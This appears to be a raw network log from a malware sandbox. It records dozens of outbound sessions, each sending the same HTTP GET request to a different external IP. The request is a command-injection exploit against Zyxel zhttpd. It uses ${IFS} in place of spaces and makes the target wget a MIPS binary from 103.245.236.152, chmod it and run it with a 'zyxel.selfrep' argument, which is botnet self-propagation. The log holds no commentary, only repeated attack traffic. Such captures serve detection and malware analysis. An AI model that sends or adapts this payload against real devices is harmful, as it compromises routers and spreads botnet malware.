                                        Jan 14, 2024 16:18:59.817085981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8540192.168.2.1352000151.85.15.244443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.817118883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8541192.168.2.1355766113.122.155.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.817176104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8542192.168.2.134787070.186.148.235443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.817226887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8543192.168.2.1350036126.251.189.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.817277908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8544192.168.2.1354426167.63.155.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.817351103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8545192.168.2.1342436104.143.209.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.817408085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8546192.168.2.1336710209.154.120.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.817462921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8547192.168.2.1345108174.185.146.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.817523956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8548192.168.2.1352888118.132.107.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.817563057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8549192.168.2.1345900172.80.53.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.817641020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8550192.168.2.134071838.196.13.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.817703962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8551192.168.2.1356538152.185.222.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.817744017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8552192.168.2.133393693.143.137.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.817806005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8553192.168.2.133359039.242.118.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.817871094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8554192.168.2.13536022.19.48.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.817912102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8555192.168.2.1352920116.40.62.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.817975998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8556192.168.2.1336966112.64.212.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.818038940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8557192.168.2.1345798169.130.170.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.818104029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8558192.168.2.1334494169.74.122.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.818175077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8559192.168.2.133980693.181.194.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.818207026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8560192.168.2.134538252.47.111.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.818269014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8561192.168.2.133633473.28.220.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.818311930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8562192.168.2.134593482.244.79.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.818402052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8563192.168.2.134283672.71.108.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.818459988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8564192.168.2.1343314164.175.239.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.818499088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8565192.168.2.134050657.118.136.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.818578005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8566192.168.2.134031667.59.234.12443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.818629980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8567192.168.2.1355876183.117.228.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.818701982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8568192.168.2.134150669.228.216.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.818752050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8569192.168.2.136040497.69.142.36443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.818814039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8570192.168.2.1335776205.136.87.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.818886042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8571192.168.2.133935253.197.9.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.818937063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8572192.168.2.135194080.115.90.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.818979979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8573192.168.2.134479818.25.86.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.819036007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8574192.168.2.1343214175.11.1.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.819116116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8575192.168.2.1343106124.4.188.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.819133043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8576192.168.2.1342936194.8.40.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.819168091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8577192.168.2.134763499.242.100.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.819257975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8578192.168.2.134069872.148.207.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.819283962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8579192.168.2.1344136123.149.215.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.819349051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8580192.168.2.1337846213.162.133.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.819406986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8581192.168.2.134448245.69.48.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.819466114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8582192.168.2.1336942212.141.84.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.819499016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8583192.168.2.134432063.14.88.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.819550037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8584192.168.2.1344632172.231.67.150443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.819613934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8585192.168.2.1337038123.241.123.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.819667101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8586192.168.2.133362618.181.112.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.819737911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8587192.168.2.135756248.215.32.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.819777012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8588192.168.2.1354316170.75.123.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.819845915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8589192.168.2.1352300185.120.193.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.819907904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8590192.168.2.133543290.244.11.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.819977999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8591192.168.2.1338704222.129.222.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.820031881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8592192.168.2.1349180142.116.66.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.820075989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8593192.168.2.1357560153.61.33.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.820169926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8594192.168.2.1354154202.249.36.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.820208073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8595192.168.2.1358884196.239.187.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.820209026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8596192.168.2.1355726159.127.181.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.820286036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8597192.168.2.1335508174.26.92.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.820291996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8598192.168.2.135612013.117.54.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.820364952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8599192.168.2.13367708.71.15.0443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.820393085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8600192.168.2.135678439.188.101.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.820446968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8601192.168.2.1358304211.130.28.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.820477962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8602192.168.2.1358972189.50.207.57443
                                        TimestampBytes transferredDirectionData
